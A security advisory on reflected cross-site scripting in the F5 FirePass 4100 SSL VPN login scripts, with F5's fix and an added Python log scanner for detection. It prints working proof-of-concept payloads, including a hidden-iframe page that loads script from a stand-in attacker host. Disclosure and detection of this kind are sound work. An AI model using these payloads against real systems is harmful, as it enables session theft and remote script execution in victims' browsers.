F5 FirePass 4100 SSL VPN Cross-Site Scripting (XSS) and HTML Injection
------------------------------------------------------------------------
SUMMARY
F5 Networks FirePass <http://www.f5.com/products/firepass/> "is a SSL VPN
solution by F5 Networks". The F5 Networks FirePass 4100 SSL VPN is vulnerable
to XSS within the "my.logon.php3" and "my.activation.php3" server-side
scripts.
DETAILS
Vulnerable Systems:
* F5 FirePass 4100
  o FirePass versions 5.4.1 - 5.5.2
  o FirePass versions 6.0 - 6.0.1
An attacker may be able to cause execution of malicious scripting code in
the browser of a user who visits a specially-crafted URL to an F5 FirePass
device, or visits a malicious page that makes a request to such a URL. Such
code would run within the security context of the target domain.
This type of attack can result in non-persistent defacement of the target
site, or the redirection of confidential information (i.e. admin session
IDs) to unauthorised third parties.
Proof of concept (PoC) URL:
https://target.tld/my.logon.php3?"></script><textarea>HTML_injection_test</textarea><!--
The payload in the example is
"></script><textarea>HTML_injection_test</textarea><!--
which injects a 'textarea' box.
The following PoC HTML page would run JavaScript without any restrictions
from a third-party file ('http://www.evil.foo/b' in this case):
<html>
<iframe
src="https://target.tld/my.logon.php3?%22%3E%3C/script%3E%3Cscript%3Eeval%28name%29%3C/script%3E%3C%21--" width="0%" height="0%" name="xss=document.body.appendChild(document.createElement('script'));xss.setAttribute('src','http://www.evil.foo/b')"></iframe>
</html>
Solution:
F5 Networks has issued SOL7923:
https://support.f5.com/kb/en-us/solutions/public/7000/900/SOL7923.html?sr=1
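Requests of the shape shown in the PoC can be looked for in the access logs of the appliance or of a proxy in front of it. The following Python sketch is an added example, not part of the original advisory or of F5's fix; it assumes common/combined-format log lines, and the sample entries (addresses, timestamps, the "lang=en" query) are constructed.

```python
import re
from urllib.parse import unquote

# Scripts named in the advisory as reflecting request data.
AFFECTED_SCRIPTS = ("/my.logon.php3", "/my.activation.php3")
# Characters needed to break out of an attribute or tag context.
MARKUP = re.compile(r'[<>"]')
# Request line of a common/combined-format access log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised too."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_suspicious(target):
    """True if the target hits an affected script with markup in its query."""
    path, _, query = target.partition("?")
    if not fully_decode(path).lower().endswith(AFFECTED_SCRIPTS):
        return False
    return bool(MARKUP.search(fully_decode(query)))

def flag_requests(lines):
    """Return (line number, decoded query string) for each suspicious entry."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        if match and is_suspicious(match.group(1)):
            query = match.group(1).partition("?")[2]
            hits.append((number, fully_decode(query)))
    return hits

# Constructed sample log; line 2 carries the advisory's PoC payload.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2008:10:00:00 +0000] "GET /my.logon.php3 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [01/Jan/2008:10:00:05 +0000] "GET /my.logon.php3?%22%3E%3C/script%3E%3Ctextarea%3EHTML_injection_test%3C/textarea%3E%3C%21-- HTTP/1.1" 200 5200',
    '192.0.2.12 - - [01/Jan/2008:10:00:09 +0000] "GET /my.activation.php3?%2522%253E%253Ctextarea%253E HTTP/1.1" 200 4100',
    '192.0.2.13 - - [01/Jan/2008:10:00:12 +0000] "GET /my.logon.php3?lang=en HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for number, query in flag_requests(SAMPLE_LOG):
        print(f"line {number}: {query}")
```

Because the decoding is repeated, the double-encoded request on line 3 is flagged as well as the singly encoded PoC on line 2.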
ADDITIONAL INFORMATION
The information has been provided by ProCheckUp Research
<mailto:research@procheckup.com>.
The original article can be found at:
http://www.procheckup.com/Vulnerability_2007.php
========================================
This bulletin is sent to members of the SecuriTeam mailing list.